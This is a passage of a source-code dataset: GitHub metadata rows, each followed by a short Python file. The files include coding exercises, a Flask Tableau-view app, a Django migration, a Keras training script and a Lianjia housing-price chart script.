a6f026f02000c15a466f70505538d8d0d47501fc | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p02264/s889112571.py | 2e212a2e0961278eca5e971a4029146c58b8aed7 | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 729 | py | #!/usr/bin/env python
#-*- coding:utf-8 -*-
from collections import deque
def process_task(task,qua, elapsed_time, complete_task):
exe_task = task.popleft()
t = int(exe_task[1])
q = int(qua)
if t-q > 0:
exe_task[1] = (t - q)
task.append(exe_task)
elapsed_time += q
else:
elapsed_time += t
complete_task.append([exe_task[0], elapsed_time])
return elapsed_time,complete_task
def main():
n,q = map(int, raw_input().split())
task = [raw_input().split() for _ in range(n)]
que = deque(task)
ela_time = 0
comp_task = []
while len(que) != 0:
ela_time , comp_task= process_task(que, q, ela_time,comp_task)
for i in comp_task:
print i[0], i[1]
#def test():
if __name__ == '__main__':
main()
#test() | [
"66529651+Aastha2104@users.noreply.github.com"
] | 66529651+Aastha2104@users.noreply.github.com |
b540b5f7f786c6f93344f17dad5191ffb5aa943b | f1790e298bcbf7b26cacd3c27850f243c446b9eb | /courses/python3/ch4-POO/06_lesson/encapsulation.py | 4ef417bcf9d7cecb3c934a7fb024c8b3d3026c50 | [] | no_license | misa9999/python | 36001a1bf0eb842d00b010b02e05b01aa4dfac57 | 251c5226db1bfef4a8445b025f232a27a6924930 | refs/heads/master | 2023-03-04T16:25:48.610233 | 2021-02-22T21:37:51 | 2021-02-22T21:37:51 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 781 | py | """
public, protected, private
_ private/protected (public _)
__ private (_classname__attributename)
"""
class DataBase:
def __init__(self):
self.__data = {}
@property
def data(self):
return self.__data
def insert_customer(self, id, name):
if 'customers' not in self.__data:
self.__data['customers'] = {id: name}
else:
self.__data['customers'].update({id: name})
def show_customers(self):
for id, name in self.__data['customers'].items():
print(id, name)
def delete_customer(self, id):
del self.__data['customers'][id]
bd = DataBase()
bd.insert_customer(1, 'misa')
bd.insert_customer(2, 'lucy')
bd.insert_customer(3, 'megumin')
print(bd.data)
# bd.show_customers()
| [
"yuukixasuna00@gmailcom"
] | yuukixasuna00@gmailcom |
94de939343ae164a3702f2bf9f858e30ffc66e50 | 9276d5905d0bd4b892bccc3f3f9218124c356e59 | /tableau_view_extractor/routes.py | 0cac2c256afb2d0b2268ccd4603eb019cadb2ca2 | [] | no_license | toddbirchard/tableau-extraction | 7de813d8c547b11df13166c4bb3962b071f36602 | 0bddb8f4afe32fbef3bb6ab2c0b0076f62ca6fc4 | refs/heads/master | 2023-04-06T14:55:40.738915 | 2023-03-19T15:34:11 | 2023-03-19T15:34:11 | 162,696,737 | 19 | 2 | null | 2020-05-16T06:27:53 | 2018-12-21T09:49:26 | Python | UTF-8 | Python | false | false | 3,029 | py | import pandas as pd
from flask import Blueprint, Markup
from flask import current_app as app
from flask import render_template, request
from flask_assets import Bundle, Environment
from . import database, tableau
home_blueprint = Blueprint(
"home", __name__, template_folder="templates", static_folder="static"
)
assets = Environment(app)
js = Bundle("js/*.js", filters="jsmin", output="dist/packed.js")
scss = Bundle("scss/*.scss", filters="libsass", output="dist/all.css")
assets.register("scss_all", scss)
assets.register("js_all", js)
scss.build(force=True, disable_cache=True)
js.build(force=True, disable_cache=True)
@home_blueprint.route("/nav.jinja2", methods=["GET"])
def nav():
"""Build nav before every template render."""
tableau_view_extractor = tableau.ExtractTableauView()
xml = tableau_view_extractor.initialize_tableau_request()
token = tableau_view_extractor.get_token(xml)
all_sites = tableau_view_extractor.list_sites(token)
return render_template("nav.jinja2", all_sites=all_sites)
@home_blueprint.route("/", methods=["GET", "POST"])
def entry():
"""Homepage which lists all available views."""
tableau_view_extractor = tableau.ExtractTableauView()
xml = tableau_view_extractor.initialize_tableau_request()
token = tableau_view_extractor.get_token(xml)
site_id = tableau_view_extractor.get_site(xml, "id")
site_name = tableau_view_extractor.get_site(xml, "contentUrl")
views = tableau_view_extractor.list_views(site_id, xml, token)
all_sites = tableau_view_extractor.list_sites(token)
site = tableau_view_extractor.get_site(xml)
return render_template(
"index.jinja2",
title="Here are your views.",
template="home-template",
views=views,
token=token,
xml=xml,
site_name=site_name,
site=site,
all_sites=all_sites,
)
@home_blueprint.route("/view", methods=["GET", "POST"])
def view():
"""Display a preview of a selected view."""
site = request.args.get("site")
xml = request.args.get("xml")
view = request.args.get("view")
token = request.args.get("token")
tableau_view_extractor = tableau.ExtractTableauView()
view_df = tableau_view_extractor.get_view(site, xml, view, token)
view_df.to_csv("application/static/data/view.csv")
return render_template(
"view.jinja2",
title="Your View",
template="home-template",
view=view,
token=token,
xml=xml,
site=site,
view_df=Markup(view_df.to_html(index=False)),
)
@home_blueprint.route("/export", methods=["GET", "POST"])
def export():
"""Export view to external database."""
view_df = pd.read_csv("application/static/data/view.csv")
view_df.to_sql(
name="temp",
con=database.engine,
if_exists="replace",
chunksize=50,
index=True,
)
return render_template(
"export.jinja2",
title="Success!",
template="success-template",
)
| [
"toddbirchard@gmail.com"
] | toddbirchard@gmail.com |
be580a0a5cb16a37c9dd6cee1362c8df71b77f7d | 4495b65528bd00824a97520dee7ce22a5555ce44 | /bin/dirprinter | 48a7311fdb5989a5e1f447feede2acdc73b0498a | [] | no_license | steder/txproject | f0e7a8e57fddc454f35bc62f8273f8fb0e37f5c9 | 928d8ff40bc1b60998f6123b1b1b78f10251bf00 | refs/heads/master | 2021-01-13T02:06:45.623511 | 2015-04-13T14:17:43 | 2015-04-13T14:17:43 | 3,346,414 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 576 | #!/usr/bin/env python
#-*- mode: python -*-
"""dirprinter
Pretty prints directories like this:
Example:
$ dirprinter dirname
dirname/
|-- printer.py
`-- testdir/
|-- subdir/
|-- |-- test3.txt
|-- `-- test4.txt
|-- test1.txt
`-- test2.txt
"""
import sys
from txproject import printer
from txproject import scripts
parser = scripts.getDirprinterOptionsParser(__doc__)
options, args = parser.parse_args()
if len(args) != 1:
parser.error("requires a single directory name as an argument")
path = args[0]
printer.printDirectory(path)
| [
"steder@gmail.com"
] | steder@gmail.com | |
c804374672e41fb2e779de2aa60a61a57c0ea935 | b7341581abaf2fb50e10e14911cc579e606a23d2 | /sirius_sdk/agent/wallet/abstract/non_secrets.py | a47cd8e70608d744123c602ab0e69692772ca7e1 | [
"Apache-2.0"
] | permissive | GarlonHasham/sirius-sdk-python | 3e627af6c2b3ef641b27514787fb08d0e0b30808 | 715b12c910574d78502f186aa512bc1ef5b63fbc | refs/heads/master | 2023-05-14T03:56:29.141362 | 2021-06-03T10:42:01 | 2021-06-03T10:42:01 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,289 | py | import json
from abc import ABC, abstractmethod
from typing import Optional, List
from sirius_sdk.base import JsonSerializable
class RetrieveRecordOptions(JsonSerializable):
def __init__(self, retrieve_type: bool=False, retrieve_value: bool=False, retrieve_tags: bool=False):
self.retrieve_type = retrieve_type
self.retrieve_value = retrieve_value
self.retrieve_tags = retrieve_tags
def check_all(self):
self.retrieve_type = True
self.retrieve_value = True
self.retrieve_tags = True
def to_json(self):
options = dict()
if self.retrieve_type:
options['retrieveType'] = self.retrieve_type
if self.retrieve_value:
options['retrieveValue'] = self.retrieve_value
if self.retrieve_tags:
options['retrieveTags'] = self.retrieve_tags
return options
def serialize(self):
return json.dumps(self.to_json())
def deserialize(self, buffer: str):
data = json.loads(buffer)
self.retrieve_type = data.get('retrieveType', False)
self.retrieve_value = data.get('retrieveValue', False)
self.retrieve_tags = data.get('retrieveTags', False)
class AbstractNonSecrets(ABC):
@abstractmethod
async def add_wallet_record(self, type_: str, id_: str, value: str, tags: dict=None) -> None:
"""
Create a new non-secret record in the wallet
:param type_: allows to separate different record types collections
:param id_: the id of record
:param value: the value of record
:param tags: the record tags used for search and storing meta information as json:
{
"tagName1": <str>, // string tag (will be stored encrypted)
"tagName2": <str>, // string tag (will be stored encrypted)
"~tagName3": <str>, // string tag (will be stored un-encrypted)
"~tagName4": <str>, // string tag (will be stored un-encrypted)
}
:return: None
"""
raise NotImplemented
@abstractmethod
async def update_wallet_record_value(self, type_: str, id_: str, value: str) -> None:
"""
Update a non-secret wallet record value
:param type_: allows to separate different record types collections
:param id_: the id of record
:param value: the value of record
:return: None
"""
raise NotImplemented
@abstractmethod
async def update_wallet_record_tags(self, type_: str, id_: str, tags: dict) -> None:
"""
Update a non-secret wallet record value
:param type_: allows to separate different record types collections
:param id_: the id of record
:param tags: ags_json: the record tags used for search and storing meta information as json:
{
"tagName1": <str>, // string tag (will be stored encrypted)
"tagName2": <str>, // string tag (will be stored encrypted)
"~tagName3": <str>, // string tag (will be stored un-encrypted)
"~tagName4": <str>, // string tag (will be stored un-encrypted)
}
:return: None
"""
raise NotImplemented
@abstractmethod
async def add_wallet_record_tags(self, type_: str, id_: str, tags: dict) -> None:
"""
Add new tags to the wallet record
:param type_: allows to separate different record types collections
:param id_: the id of record
:param tags: ags_json: the record tags used for search and storing meta information as json:
{
"tagName1": <str>, // string tag (will be stored encrypted)
"tagName2": <str>, // string tag (will be stored encrypted)
"~tagName3": <str>, // string tag (will be stored un-encrypted)
"~tagName4": <str>, // string tag (will be stored un-encrypted)
}
:return: None
"""
raise NotImplemented
@abstractmethod
async def delete_wallet_record_tags(self, type_: str, id_: str, tag_names: List[str]) -> None:
"""
Add new tags to the wallet record
:param type_: allows to separate different record types collections
:param id_: the id of record
:param tag_names: the list of tag names to remove from the record as json array: ["tagName1", "tagName2", ...]
:return: None
"""
raise NotImplemented
@abstractmethod
async def delete_wallet_record(self, type_: str, id_: str) -> None:
"""
Delete an existing wallet record in the wallet
:param type_: allows to separate different record types collections
:param id_: the id of record
:return: None
"""
raise NotImplemented
@abstractmethod
async def get_wallet_record(self, type_: str, id_: str, options: RetrieveRecordOptions) -> Optional[dict]:
"""
Get an wallet record by id
:param type_: allows to separate different record types collections
:param id_: the id of record
:param options:
{
retrieveType: (optional, false by default) Retrieve record type,
retrieveValue: (optional, true by default) Retrieve record value,
retrieveTags: (optional, true by default) Retrieve record tags
}
:return: wallet record json:
{
id: "Some id",
type: "Some type", // present only if retrieveType set to true
value: "Some value", // present only if retrieveValue set to true
tags: <tags json>, // present only if retrieveTags set to true
}
"""
raise NotImplemented
@abstractmethod
async def wallet_search(self, type_: str, query: dict, options: RetrieveRecordOptions, limit: int=1) -> (List[dict],int):
"""
Search for wallet records
:param type_: allows to separate different record types collections
:param query: MongoDB style query to wallet record tags:
{
"tagName": "tagValue",
$or: {
"tagName2": { $regex: 'pattern' },
"tagName3": { $gte: '123' },
},
}
:param options:
{
retrieveRecords: (optional, true by default) If false only "counts" will be calculated,
retrieveTotalCount: (optional, false by default) Calculate total count,
retrieveType: (optional, false by default) Retrieve record type,
retrieveValue: (optional, true by default) Retrieve record value,
retrieveTags: (optional, true by default) Retrieve record tags,
}
:param limit: max record count to retrieve
:return: wallet records json:
{
totalCount: <str>, // present only if retrieveTotalCount set to true
records: [{ // present only if retrieveRecords set to true
id: "Some id",
type: "Some type", // present only if retrieveType set to true
value: "Some value", // present only if retrieveValue set to true
tags: <tags json>, // present only if retrieveTags set to true
}],
}
"""
raise NotImplemented
| [
"minikspb@gmail.com"
] | minikspb@gmail.com |
33f0a35f5feb7df1dd4eaeaba4f463974e6e5c27 | 1d60c5a7b8ce6277bff514e376f79848f706344c | /Data Engineer with Python/02. Streamlined Data Ingestion with pandas/03. Importing Data from Databases/02. Load entire tables.py | 87520ffcb0f8e37e20dcee08416d6f66edf13411 | [] | no_license | DidiMilikina/DataCamp | 338c6e6d3b4f5b6c541c1aba155a36e9ee24949d | 3bf2cf3c1430190a7f8e54efda7d50a5fd66f244 | refs/heads/master | 2020-12-15T13:16:54.178967 | 2020-05-06T17:30:54 | 2020-05-06T17:30:54 | 235,113,616 | 4 | 3 | null | null | null | null | UTF-8 | Python | false | false | 1,266 | py | '''
Load entire tables
In the last exercise, you saw that data.db has two tables. weather has historical weather data for New York City. hpd311calls is a subset of call records made to the city's 311 help line about housing issues.
In this exercise, you'll use the read_sql() function in pandas to load both tables. read_sql() accepts a string of either a SQL query to run, or a table to load. It also needs a way to connect to the database, like the engine in the provided code.
Instructions 1/2
50 XP
1
Use read_sql() to load the hpd311calls table by name, without any SQL.
2
Use read_sql() and a SELECT * ... SQL query to load the entire weather table.
'''
SOLUTION
1
# Load libraries
import pandas as pd
from sqlalchemy import create_engine
# Create the database engine
engine = create_engine('sqlite:///data.db')
# Load hpd311calls without any SQL
hpd_calls = pd.read_sql('hpd311calls', engine)
# View the first few rows of data
print(hpd_calls.head())
2
# Create the database engine
engine = create_engine("sqlite:///data.db")
# Create a SQL query to load the entire weather table
query = """
SELECT *
FROM weather;
"""
# Load weather with the SQL query
weather = pd.read_sql(query, engine)
# View the first few rows of data
print(weather.head()) | [
"didimilikina8@gmail.com"
] | didimilikina8@gmail.com |
ae630ac12f733e37781b6ebbc2773032c9f2cac5 | 88863cb16f35cd479d43f2e7852d20064daa0c89 | /DraperImageChronology/src/inv-hist-match.py | 5bc7b4f8af190bf3b43f08c71c04caa2a975ea03 | [] | no_license | chrishefele/kaggle-sample-code | 842c3cd766003f3b8257fddc4d61b919e87526c4 | 1c04e859c7376f8757b011ed5a9a1f455bd598b9 | refs/heads/master | 2020-12-29T12:18:09.957285 | 2020-12-22T20:16:35 | 2020-12-22T20:16:35 | 238,604,678 | 3 | 1 | null | null | null | null | UTF-8 | Python | false | false | 853 | py |
# invert histogram matching on an image
import cv2
import sys
import numpy
MAX = 255
MIN = 0
f_in = sys.argv[1]
f_out = sys.argv[2]
img_in = cv2.imread(f_in)
img_out = numpy.zeros_like(img_in)
RGB = (0,1,2)
for chan in RGB:
mean = img_in[:,:,chan].mean()
hist = cv2.calcHist([img_in], [chan], None, [256], [0,256])
hist = hist.flatten().astype(int)
lut = numpy.zeros_like(hist)
ptr = int(mean)
for i in range(int(mean), MAX+1, 1):
if hist[i] > 0:
lut[i] = ptr
ptr += 1
ptr = int(mean)-1
for i in range(int(mean)-1, MIN, -1):
if hist[i] > 0:
lut[i] = ptr
ptr -= 1
img_out[:,:,chan] = lut[ img_in[:,:,chan] ]
print "channel:", chan, "mean:", mean
print "hist:", hist
print "lut:", lut
print
cv2.imwrite(f_out, img_out)
| [
"c.hefele@verizon.net"
] | c.hefele@verizon.net |
9946676665a43725bcf984b91c4ab8323c8ddfe2 | d62cbada00caf2f7784066014a87e18052d6fa9f | /darksite/functional_tests/blog/test_list_posts.py | b8bd85d1dfcf15b689e4663ee7234a073d6f17d6 | [
"MIT"
] | permissive | UNCDarkside/DarksiteAPI | d6653990bce6b78db78efc672fde2c0ff20e4597 | a4bc1f4adee7ecfba840ad45da22513f88acbbd0 | refs/heads/master | 2020-04-11T17:36:19.062963 | 2019-01-11T03:42:31 | 2019-01-11T03:42:31 | 161,967,336 | 0 | 0 | MIT | 2019-10-22T22:09:50 | 2018-12-16T04:23:27 | Python | UTF-8 | Python | false | false | 1,311 | py | from cms.blog import models
POST_LIST_QUERY = """
query {
posts {
author {
id
name
}
content
published
rendered
slug
title
updated
}
}
"""
def test_list_posts(api_client, post_factory):
"""
Users should be able to query a list of blog posts through the
GraphQL API.
"""
# Assuming there are two posts already in the database...
post_factory(content="# Post 1", title="Post 1")
post_factory(content="# Post 2", title="Post 2")
# I would expect my response to be...
expected = []
for post in models.Post.objects.all():
expected.append(
{
"author": {
"id": str(post.author.id),
"name": post.author.name,
},
"content": post.content,
"published": post.published.isoformat(),
"rendered": post.rendered,
"slug": post.slug,
"title": post.title,
"updated": post.updated.isoformat(),
}
)
# Make the actual request
response = api_client.query(POST_LIST_QUERY)
response.raise_for_status()
# Check content
assert response.status_code == 200
assert response.json() == {"data": {"posts": expected}}
| [
"chathan@driehuys.com"
] | chathan@driehuys.com |
76c7e9f6bb07b3cce7f96db7880426f1f4f29e45 | 9743d5fd24822f79c156ad112229e25adb9ed6f6 | /xai/brain/wordbase/nouns/_pursing.py | 97ccd6b1d0f43869691995232bdae3346650ddd4 | [
"MIT"
] | permissive | cash2one/xai | de7adad1758f50dd6786bf0111e71a903f039b64 | e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6 | refs/heads/master | 2021-01-19T12:33:54.964379 | 2017-01-28T02:00:50 | 2017-01-28T02:00:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 233 | py |
from xai.brain.wordbase.nouns._purse import _PURSE
#calss header
class _PURSING(_PURSE, ):
def __init__(self,):
_PURSE.__init__(self)
self.name = "PURSING"
self.specie = 'nouns'
self.basic = "purse"
self.jsondata = {}
| [
"xingwang1991@gmail.com"
] | xingwang1991@gmail.com |
2c3ea8b81536b7c933e4b3a416923e9b9f6d2579 | cbedb18df0aaac810aeea87a2273edb15c1cf899 | /Strings/49. Group Anagrams (python string builder).py | 8b0bb59ac43006a54f171ca77f88aec37cd1619d | [] | no_license | kanglicheng/CodeBreakersCode | 71b833bb9f4c96d520c26f0044365dc62137a940 | 31f7f730227a0e10951e7468bad1b995cf2eafcb | refs/heads/master | 2023-08-07T20:32:05.267695 | 2020-09-14T14:36:25 | 2020-09-14T14:36:25 | 265,978,034 | 0 | 0 | null | 2020-05-22T00:05:29 | 2020-05-22T00:05:29 | null | UTF-8 | Python | false | false | 1,035 | py | # not sure about the solution at start
# sort each str => O(W logW), w is the length of each words -> O(N * W log W) or counting sort O(N*W)
# turn each word into count char list: each list length is fixed:26 -> need O(W) to turn to list
# but lst can't hash -> turn to str then use hash map
class Solution:
def groupAnagrams(self, strs: List[str]) -> List[List[str]]:
_dict = {}
for w in strs:
arr = [0] * 26
for c in w:
index = ord(c) - ord('a')
arr[index] += 1
sortedStr = ""
for v in arr:
sortedStr += (str(v) + "|")
if sortedStr in _dict:
_dict[sortedStr].append(w)
else:
_dict[sortedStr] = [w]
res = []
for val in _dict.values():
res.append(val)
return res
| [
"56766457+Wei-LiHuang@users.noreply.github.com"
] | 56766457+Wei-LiHuang@users.noreply.github.com |
70573600e0f7e3bf2144f550ad7a28e7db17e2c2 | 5f5c052aa6a42e7492daf940c9561f5ce84ecb1c | /geatpy/demo/sentense_search/aimfuc.py | 68a6d1234a3b6ecaa5b0919fae9690a3c6b8f466 | [] | no_license | siuyincheung/geatpy | 8b343087c506cef39a7dc377a667ae9f1392acd4 | 48d41c8835004d9b0c36060881ed9cfb07483f1e | refs/heads/master | 2020-03-27T08:15:57.973576 | 2018-08-27T00:21:00 | 2018-08-27T00:21:00 | 146,237,904 | 1 | 0 | null | 2018-08-27T02:39:41 | 2018-08-27T02:39:41 | null | UTF-8 | Python | false | false | 327 | py | import numpy as np
def aimfuc(Phen):
real = np.array([ord('I'),ord(' '),ord('a'),ord('m'),ord(' '),ord('a'),
ord(' '),ord('l'),ord('i'),ord('t'),ord('t'),ord('l'),
ord('e'),ord(' '),ord('b'),ord('o'),ord('y')])
diff = np.sum((Phen - real)**2, 1)
return np.array([diff]).T
| [
"jazzbin@geatpy.com"
] | jazzbin@geatpy.com |
7a59a1045aed4872467a495c9c8559d6cf22d43b | 716ed8ab9cbd61837fb116635c2d378b32eeb890 | /app/migrations/0004_auto_20180902_0447.py | 2f5b3abdde6abf5825fdd6216228555e3f33be87 | [] | no_license | koneb71/waterworks-django | 19dab148fc46f85e1be55b8440f40f5cf2ea29c6 | 0de58e43ab04348622933f98d79c7d4c109fcb85 | refs/heads/master | 2020-03-28T07:18:50.512581 | 2018-10-15T03:53:05 | 2018-10-15T03:53:05 | 147,893,717 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,123 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.11.4 on 2018-09-02 12:47
from __future__ import unicode_literals
import datetime
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('app', '0003_auto_20180902_0447'),
]
operations = [
migrations.AlterField(
model_name='client',
name='account_number',
field=models.CharField(default=b'2018024753', max_length=30),
),
migrations.AlterField(
model_name='client',
name='meter_serial_number',
field=models.CharField(default=b'814296570', max_length=30),
),
migrations.AlterField(
model_name='collection',
name='created_date',
field=models.DateTimeField(blank=True, default=datetime.datetime(2018, 9, 2, 4, 47, 53, 490427)),
),
migrations.AlterField(
model_name='collection',
name='due_date',
field=models.DateTimeField(blank=True, default=datetime.datetime(2018, 10, 2, 4, 47, 53, 490458)),
),
]
| [
"koneb2013@gmail.com"
] | koneb2013@gmail.com |
9c01e7f694d285cbc82aed43b85433d7426fc179 | d554b1aa8b70fddf81da8988b4aaa43788fede88 | /5 - Notebooks e Data/1 - Análises numéricas/Arquivos David/Atualizados/logDicas-master/data/2019-1/224/users/4363/codes/1596_2049.py | 2393618f22d551063f10e697c5ea26d03c3da23b | [] | no_license | JosephLevinthal/Research-projects | a3bc3ca3b09faad16f5cce5949a2279cf14742ba | 60d5fd6eb864a5181f4321e7a992812f3c2139f9 | refs/heads/master | 2022-07-31T06:43:02.686109 | 2020-05-23T00:24:26 | 2020-05-23T00:24:26 | 266,199,309 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 278 | py | # Teste seu codigo aos poucos.
# Nao teste tudo no final, pois fica mais dificil de identificar erros.
# Nao se intimide com as mensagens de erro. Elas ajudam a corrigir seu codigo.
x = int(input("dividendo "))
y = int(input("divisor "))
print(x)
print(y)
print(x//y)
print(x%y) | [
"jvlo@icomp.ufam.edu.br"
] | jvlo@icomp.ufam.edu.br |
55c84f580c92d7a7645d5c9af2c759b950a7f84a | ac64fda7f1bfc92f7897efd60b8f3f0aeb22b4d7 | /syntactic_mutations/mnist_tr/mutants/mutant118.py | c11c9efb905c74722b9130a38af9dbfcb856ee71 | [] | no_license | dlfaults/mutation_operators_evaluation | ea7f33459ba7bcf7d70092d9db8b40f9b338d516 | 7d1ff30e901931a46bf8908e9bb05cae3daa5f0f | refs/heads/master | 2020-12-27T15:45:07.262012 | 2020-02-03T12:22:01 | 2020-02-03T12:22:01 | 237,955,342 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,611 | py | import datetime
import keras
from keras.datasets import mnist
from keras.models import Sequential
from keras.layers import Dense, Dropout, Activation, Flatten
from keras.layers import Conv2D, MaxPooling2D
from keras import backend as K
now = datetime.datetime.now
batch_size = 128
num_classes = 5
epochs = 5
(img_rows, img_cols) = (28, 28)
filters = 32
pool_size = 2
kernel_size = 3
input_shape = (img_rows, img_cols, 1)
def train(model, train, test, num_classes, model_name):
x_train = train[0].reshape((train[0].shape[0],) + input_shape)
x_test = test[0].reshape((test[0].shape[0],) + input_shape)
x_train = x_train.astype('float32')
x_test = x_test.astype('float32')
x_train /= 255
x_test /= 255
y_train = keras.utils.to_categorical(train[1], num_classes)
y_test = keras.utils.to_categorical(test[1], num_classes)
model.compile(loss='categorical_crossentropy', optimizer=\
'adadelta', metrics=\
['accuracy'])
model.fit(x_train, y_train, batch_size=\
batch_size, epochs=\
epochs, verbose=\
1, validation_data=\
(x_test, y_test))
model.save(model_name)
score = model.evaluate(x_test, y_test, verbose=0)
return (score[0], score[1])
def train_model(x_train, y_train, x_test, y_test, model1_name, model2_name):
x_train_lt5 = x_train[y_train < 5]
y_train_lt5 = y_train[y_train < 5]
x_test_lt5 = x_test[y_test < 5]
y_test_lt5 = y_test[y_test < 5]
x_train_gte5 = x_train[y_train >= 5]
y_train_gte5 = y_train[y_train >= 5] - 5
x_test_gte5 = x_test[y_test >= 5]
y_test_gte5 = y_test[y_test >= 5] - 5
feature_layers = [\
Conv2D(filters, kernel_size, padding=\
'valid', input_shape=\
input_shape), \
Activation('relu'), \
Conv2D(filters, kernel_size), \
Activation('relu'), \
MaxPooling2D(pool_size=pool_size), \
Dropout(0.25), \
Flatten()]
classification_layers = [\
Dense(128), \
Activation('relu'), \
Dropout(0.5), \
Dense(num_classes), \
Activation('softmax')]
model = Sequential(feature_layers + classification_layers)
(loss1, acc1) = train(model,
(x_train_lt5, y_train_lt5),
(x_test_lt5, y_test_lt5), num_classes, model1_name)
for l in feature_layers:
l.trainable = False
(loss2, acc2) = train(model,
(x_train_gte5, y_train_gte5),
(x_test_gte5, y_test_gte5), num_classes, model2_name)
pass | [
"gunel71@gmail.com"
] | gunel71@gmail.com |
870f58223b2bf1ea451ad5f430647e0c076b21c0 | 38c10c01007624cd2056884f25e0d6ab85442194 | /third_party/catapult/systrace/systrace/systrace_agent.py | 376d4f2507b0a8d04b8fa336d1c78567ee61812b | [
"BSD-3-Clause",
"LGPL-2.0-or-later",
"GPL-1.0-or-later",
"MIT",
"Apache-2.0"
] | permissive | zenoalbisser/chromium | 6ecf37b6c030c84f1b26282bc4ef95769c62a9b2 | e71f21b9b4b9b839f5093301974a45545dad2691 | refs/heads/master | 2022-12-25T14:23:18.568575 | 2016-07-14T21:49:52 | 2016-07-23T08:02:51 | 63,980,627 | 0 | 2 | BSD-3-Clause | 2022-12-12T12:43:41 | 2016-07-22T20:14:04 | null | UTF-8 | Python | false | false | 1,647 | py | # Copyright (c) 2015 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
class SystraceAgent(object):
"""The base class for systrace agents.
A systrace agent contains the command-line options and trace categories to
capture. Each systrace agent has its own tracing implementation.
"""
def __init__(self, options, categories):
"""Initialize a systrace agent.
Args:
options: The command-line options.
categories: The trace categories to capture.
"""
self._options = options
self._categories = categories
def start(self):
"""Start tracing.
"""
raise NotImplementedError()
def collect_result(self):
"""Collect the result of tracing.
This function will block while collecting the result. For sync mode, it
reads the data, e.g., from stdout, until it finishes. For async mode, it
blocks until the agent is stopped and the data is ready.
"""
raise NotImplementedError()
def expect_trace(self):
"""Check if the agent is returning a trace or not.
This will be determined in collect_result().
Returns:
Whether the agent is expecting a trace or not.
"""
raise NotImplementedError()
def get_trace_data(self):
"""Get the trace data.
Returns:
The trace data.
"""
raise NotImplementedError()
def get_class_name(self):
"""Get the class name
The class name is used to identify the trace type when the trace is written
to the html file
Returns:
The class name.
"""
raise NotImplementedError()
| [
"zeno.albisser@hemispherian.com"
] | zeno.albisser@hemispherian.com |
49b046dd8aff3875402eaf5275f060f0b3b0174f | 1e6681ca2569c3de32db2d3b1c957652f8d8ccb3 | /xiaoqu_to_chart.py | f9b5ad6726ff6fff1cac6d9a26eed030e88e9e19 | [] | no_license | re0phimes/lianjia-beike-spider | d48e5bb05af9c8557ff32f9ca54746c4649d6281 | cb4ff13b6145c5169263e486e03d9fbca52450fe | refs/heads/master | 2020-04-02T17:21:11.770535 | 2018-10-24T23:42:44 | 2018-10-24T23:42:44 | 154,654,321 | 1 | 0 | null | 2018-10-25T10:45:10 | 2018-10-25T10:45:10 | null | UTF-8 | Python | false | false | 2,380 | py | #!/usr/bin/env python
# coding=utf-8
# author: zengyuetian
import webbrowser
import pandas as pd
import numpy as np
from pyecharts import Bar
import webbrowser as web
import os
import time
from lib.utility.version import PYTHON_3
if __name__ == '__main__':
try:
if PYTHON_3:
os.system("ps aux | grep python | grep http.server | grep -v grep | awk '{print $2}' | xargs kill")
os.system("python -m http.server 8080 & > /dev/null 2>&1 ")
else:
os.system("ps aux | grep python | grep SimpleHTTPServer | grep -v grep | awk '{print $2}' | xargs kill")
os.system("python -m SimpleHTTPServer 8080 & > /dev/null 2>&1 ")
except Exception as e:
pass
# 注意,已经将分割符号转换成分号,因为有的小区名中有逗号
df = pd.read_csv("xiaoqu.csv", encoding="utf-8", sep=";")
# 打印总行数
print("row number is {0}".format(len(df.index)))
# 过滤房价为0的无效数据
df = df[df.price > 0]
# # 去除重复行
# df = df.drop_duplicates()
print("row number is {0}".format(len(df.index)))
####################################################
# 最贵的小区排名
####################################################
df.sort_values("price", ascending=False, inplace=True)
num = 3
print(df.head(num))
city = df["city_ch"][0]
xqs = df["xiaoqu"][0:num]
prices = df["price"][0:num]
bar = Bar("{0}小区均价".format(city))
bar.add("小区均价前{0}名".format(num), xqs, prices, is_stack=True, is_label_show=True)
bar.render(path="xiaoqu.html")
####################################################
# 区县均价排名
####################################################
district_df = df.groupby('district').mean()
district_df = district_df.round(0)
district_df.sort_values("price", ascending=False, inplace=True)
print(district_df)
districts = district_df.index
prices = district_df["price"]
bar = Bar("{0}区县均价".format(city))
bar.add("区县均价排名", districts, prices, is_stack=True, is_label_show=True)
bar.render(path="district.html")
web.open("http://localhost:8080/xiaoqu.html", new=0, autoraise=True)
web.open("http://localhost:8080/district.html", new=0, autoraise=True)
# 确保页面打开
time.sleep(15)
| [
"ijumper@163.com"
] | ijumper@163.com |
55093be6c5bd69ff9bea241af4fdc6ab747a5870 | 3e0c57628c39e5042ed068451608a33b5edcf5df | /codex-py/test/config/demo_propmap.py | 69ec9605243caa7804fa759421b722ca3d5f7543 | [
"Apache-2.0"
] | permissive | egustafson/home-sensors | 5bd3c0f51be9a0a1f360ef41b45cbdfb3069286f | 232b36fe6fa2a2e3bce1391a91dffa192f17b835 | refs/heads/master | 2023-05-10T17:12:10.991008 | 2020-01-03T23:57:56 | 2020-01-03T23:57:56 | 141,070,153 | 0 | 0 | Apache-2.0 | 2023-05-01T20:20:24 | 2018-07-16T01:03:59 | Python | UTF-8 | Python | false | false | 1,030 | py | # -*- coding: utf-8 -*-
from codex.config.prop import PropMap
from codex.config.prop import PropList
tmap = { "k1": "v1",
"k2": "v2",
"k3": {"k3a": "v3a"},
"k4": {"k4a": {"k4b": "v3b"}},
# "k5": {"K$5": "v5a"},
# "k6.k6a": "v6a",
}
